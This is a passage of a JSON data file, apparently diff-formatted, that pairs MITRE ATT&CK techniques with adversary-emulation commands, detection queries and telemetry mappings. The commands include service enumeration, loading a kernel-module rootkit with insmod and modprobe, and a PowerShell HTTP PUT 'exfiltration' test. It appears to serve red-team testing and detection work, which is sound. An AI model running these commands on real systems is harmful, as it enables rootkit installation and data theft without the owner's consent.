"5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3", + "description": "Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.\n\nUpon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\\Windows\\Temp\\service-list.txt.s\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path of file to hold net.exe output", + "type": "Path", + "default": "C:\\Windows\\Temp\\service-list.txt" + } + }, + "executor": { + "command": "net.exe start >> #{output_file}\n", + "cleanup_command": "del /f /q /s #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "System Service Discovery - systemctl", + "auto_generated_guid": "f4b26bce-4c2c-46c0-bcc5-fce062d38bef", + "description": "Enumerates system service using systemctl\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "systemctl --type=service\n", + "name": "bash" + } + } + ] + }, + { + "id": "c6607391-d02c-44b5-9b13-d3492ca58599", + "name": "Discover system services", + "description": "Identify system services", + "tactic": "discovery", + "technique": { + "attack_id": "T1007", + "name": "System Service Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-Service" + } + } + } + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"tasklist.exe\"or process_path contains \"sc.exe\"or process_path contains \"wmic.exe\")and (file_directory contains \"net.exe\\\" start\"or file_directory contains \"tasklist.exe\\\" /SVC\"and file_directory contains \"sc.exe\\\" query\"or file_directory contains \"wmic.exe\\\" service where\")", + "name": "System Service Discovery" + } + ], + "possible_detections": [ + { + "title": "Query Registry", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "status": "experimental", + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\reg.exe", + "CommandLine|contains": [ + "currentVersion\\windows", + "currentVersion\\runServicesOnce", + "currentVersion\\runServices", + "winlogon\\", + "currentVersion\\shellServiceObjectDelayLoad", + "currentVersion\\runOnce", + "currentVersion\\runOnceEx", + "currentVersion\\run", + "currentVersion\\policies\\explorer\\run", + "currentcontrolset\\services" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1010", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} PathToAtomicsFolder\\T1010\\src\\T1010.cs\n#{output_file_name}\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe #{input_source_code}\n%TEMP%\\T1010.exe\n", + "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} PathToAtomicsFolder\\T1010\\src\\T1010.cs\n#{output_file_name}\n", + "source": "atomics/T1010/T1010.yaml", + "name": "Atomic Red Team Test - Application Window Discovery" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe #{input_source_code}\n%TEMP%\\T1010.exe\n", + "source": "atomics/T1010/T1010.yaml", + "name": "Atomic Red Team Test - Application Window Discovery" + }, + { + "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)", + "source": "data/abilities/discovery/5c65eec8-4839-4713-a4e1-86b2e75d1927.yml", + "name": "Extracts the names of all open non-explorer windows, and the locations of all explorer windows." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1010", + "display_name": "Application Window Discovery", + "atomic_tests": [ + { + "name": "List Process Main Windows - C# .NET", + "auto_generated_guid": "fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4", + "description": "Compiles and executes C# code to list main window titles associated with each process.\n\nUpon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_source_code": { + "description": "Path to source of C# code", + "type": "Path", + "default": "PathToAtomicsFolder\\T1010\\src\\T1010.cs" + }, + "output_file_name": { + "description": "Name of output binary", + "type": "String", + "default": "%TEMP%\\T1010.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1010.cs must exist on disk at specified location (#{input_source_code})\n", + "prereq_command": "if (Test-Path #{input_source_code}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile \"#{input_source_code}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} #{input_source_code}\n#{output_file_name}\n", + "cleanup_command": "del /f /q /s #{output_file_name} >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "5c65eec8-4839-4713-a4e1-86b2e75d1927", + "name": "Application Window Discovery", + "description": "Extracts the names of all open non-explorer windows, and the locations of all explorer windows.", + "tactic": "discovery", + "technique": { + "attack_id": "T1010", + "name": "Application Window Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1014", + "command_list": [ + "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "sudo insmod PathToAtomicsFolder/T1014/bin/#{rootkit_name}.ko\n", + "sudo insmod #{rootkit_path}/T1014.ko\n", + "sudo modprobe #{rootkit_name}\n", + "sudo modprobe T1014\n" + ], + "commands": [ + { + "command": "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo insmod PathToAtomicsFolder/T1014/bin/#{rootkit_name}.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo insmod #{rootkit_path}/T1014.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo modprobe #{rootkit_name}\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo modprobe T1014\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1014", + "display_name": "Rootkit", + "atomic_tests": [ + { + "name": "Loadable Kernel Module based Rootkit", + "auto_generated_guid": "dfb50072-e45a-4c75-a17e-a484809c8553", + "description": "Loadable Kernel Module based Rootkit\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rootkit_source_path": { + "description": "Path to the rootkit source. Used when prerequistes are fetched.", + "type": "Path", + "default": "PathToAtomicsFolder/T1014/src/Linux" + }, + "rootkit_path": { + "description": "Path To rootkit", + "type": "String", + "default": "PathToAtomicsFolder/T1014/bin" + }, + "rootkit_name": { + "description": "Module name", + "type": "String", + "default": "T1014" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)\n", + "prereq_command": "if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt install make\nsudo apt install gcc\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;\ncp #{rootkit_source_path}/* /tmp/T1014/\ncd /tmp/T1014; make\nmkdir #{rootkit_path}\nmv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko\nrm -rf /tmp/T1014\n" + } + ], + "executor": { + "command": "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "cleanup_command": "sudo rmmod #{rootkit_name}\nsudo rm -rf #{rootkit_path}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Loadable Kernel Module based Rootkit", + "auto_generated_guid": "75483ef8-f10f-444a-bf02-62eb0e48db6f", + "description": "Loadable Kernel Module based Rootkit\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rootkit_source_path": { + "description": "Path to the rootkit source. Used when prerequistes are fetched.", + "type": "Path", + "default": "PathToAtomicsFolder/T1014/src/Linux" + }, + "rootkit_path": { + "description": "Path To rootkit", + "type": "String", + "default": "PathToAtomicsFolder/T1014/bin" + }, + "rootkit_name": { + "description": "Module name", + "type": "String", + "default": "T1014" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)\n", + "prereq_command": "if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt install make\nsudo apt install gcc\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp #{rootkit_source_path}/* /tmp/T1014\ncd /tmp/T1014; make \nsudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/\n[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014\nsudo depmod -a\n" + } + ], + "executor": { + "command": "sudo modprobe #{rootkit_name}\n", + "cleanup_command": "sudo modprobe -r #{rootkit_name}\nsudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko\nsudo depmod -a\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "File Hash", + "Compare" + ], + [ + "BIOS" + ], + [ + "MBR" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "File Hash", + "Compare" + ], + [ + "BIOS" + ], + [ + "MBR" + ], + [ + "System calls" + ], + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + null + ] + }, + { + "technique_id": "T1020", + "command_list": [ + "$fileName = \"C:\\temp\\T1020_exfilFile.txt\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "$fileName = \"#{file}\"\n$url = \"https://google.com\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "powershell/exfiltration/egresscheck" + ], + "commands": [ + { + "command": "$fileName = \"C:\\temp\\T1020_exfilFile.txt\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "source": "atomics/T1020/T1020.yaml", + "name": "Atomic Red Team Test - Automated Exfiltration" + }, + { + "command": "$fileName = \"#{file}\"\n$url = \"https://google.com\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "source": "atomics/T1020/T1020.yaml", + "name": "Atomic Red Team Test - Automated Exfiltration" + }, + { + "command": "powershell/exfiltration/egresscheck", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1020", + "display_name": "Automated Exfiltration", + "atomic_tests": [ + { + "name": "IcedID Botnet HTTP PUT", + "auto_generated_guid": "9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0", + "description": "Creates a text file\nTries to upload to a server via HTTP PUT method with ContentType Header\nDeletes a created file", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file": { + "description": "Exfiltration File", + "type": "String", + "default": "C:\\temp\\T1020_exfilFile.txt" + }, + "domain": { + "description": "Destination Domain", + "type": "Url", + "default": "https://google.com" + } + }, + "executor": { + "command": "$fileName = \"#{file}\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "cleanup_command": "$fileName = \"#{file}\"\nRemove-Item -Path $fileName -ErrorAction Ignore", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "powershell/exfiltration/egresscheck", + "ATT&CK Technique #1": "T1020", + "ATT&CK Technique #2": "", + "Technique": "Automated Exfiltration", + "Concatenate for Python Dictionary": "\"powershell/exfiltration/egresscheck\": [\"T1020\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 